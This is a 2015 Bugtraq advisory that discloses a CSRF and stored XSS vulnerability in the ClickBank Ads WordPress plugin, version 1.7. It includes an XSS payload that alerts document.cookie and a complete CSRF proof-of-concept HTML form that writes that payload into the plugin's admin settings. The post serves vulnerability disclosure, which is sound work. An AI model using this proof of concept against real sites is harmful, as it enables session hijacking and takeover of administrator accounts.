Bugtraq mailing list archives

CSRF/XSS In ClickBank ads Wordpress Plugin


From: kingkaustubh () me com
Date: Wed, 6 May 2015 19:49:47 GMT

================================================================
CSRF/Stored XSS Vulnerability in ClickBank Ads V 1.7 Plugin 
================================================================


. contents:: Table Of Content

Overview
========

* Title :CSRF and Stored XSS Vulnerability in ClickBank Ads  Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/clickbank-ads-clickbank-widget/
* Severity: HIGH
* Version Affected: Version  1.7 and mostly prior to it
* Version Tested : Version  1.7
* version patched:

Description 
===========

Vulnerable Parameter 
--------------------
* Title:

About Vulnerability
-------------------
This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a 
crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into 
admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by 
hijacking admin's cookies etc.

Vulnerability Class
=================== 
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Steps to Reproduce: (POC)
=========================

After installing the plugin

1. Goto Dashboard --> Setting --> ClickBank Ads --> Title

2. Insert this payload ## "><script>+-+-1-+-+alert(document.cookie)</script> ## Into  above mention Vulnerable 
parameter Save settings and see XSS in action

3. Visit Click Ads settings page of this plugin anytime later and you can see the script executing as it is stored.

Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the 
same is below

CSRF POC Code
=============

<html>
  <body>
    <form 
action="http://127.0.0.1/wp/wp-admin/options-general.php?page=clickbank-ads-clickbank-widget/clickbank-ads.php"; 
method="POST">
      <input type="hidden" name="cbwec&#91;title&#93;" 
value="&quot;&gt;&gt;&gt;&lt;script&gt;&#43;&#45;&#43;&#45;1&#45;&#43;&#45;&#43;alert&#40;document&#46;cookie&#41;&lt;&#47;script&gt;"
 />
      <input type="hidden" name="cbwec&#91;name&#93;" value="kaustubh" />
      <input type="hidden" name="cbwec&#91;keywordbytitle2&#93;" value="Title" />
      <input type="hidden" name="cbwec&#91;keywords&#93;" value="" />
      <input type="hidden" name="cbwec&#91;adformat&#93;" value="1" />
      <input type="hidden" name="cbwec&#91;width2&#93;" value="100&#37;" />
      <input type="hidden" name="cbwec&#91;width&#93;" value="100&#37;" />
      <input type="hidden" name="cbwec&#91;height&#93;2" value="220" />
      <input type="hidden" name="cbwec&#91;height&#93;" value="220" />
      <input type="hidden" name="cbwec&#91;pos&#93;" value="Top" />
      <input type="hidden" name="cbwec&#91;bordstyle&#93;" value="1" />
      <input type="hidden" name="cbwec&#91;bordcolor&#93;" value="CCCCCC" />
      <input type="hidden" name="cbwec&#91;linkcolor&#93;" value="0000FF" />
      <input type="hidden" name="cbwec&#91;runplugin&#93;" value="1" />
      <input type="hidden" name="cbwec&#91;homepage&#93;" value="1" />
      <input type="hidden" name="cbwec&#91;onlypost&#93;" value="1" />
      <input type="hidden" name="cbwec&#95;submit" value="Save&#32;Â&#187;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


credits
=======
* Kaustubh Padwad 
* Information Security Researcher
* kingkaustubh (at) me (dot) com 
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad


Current thread: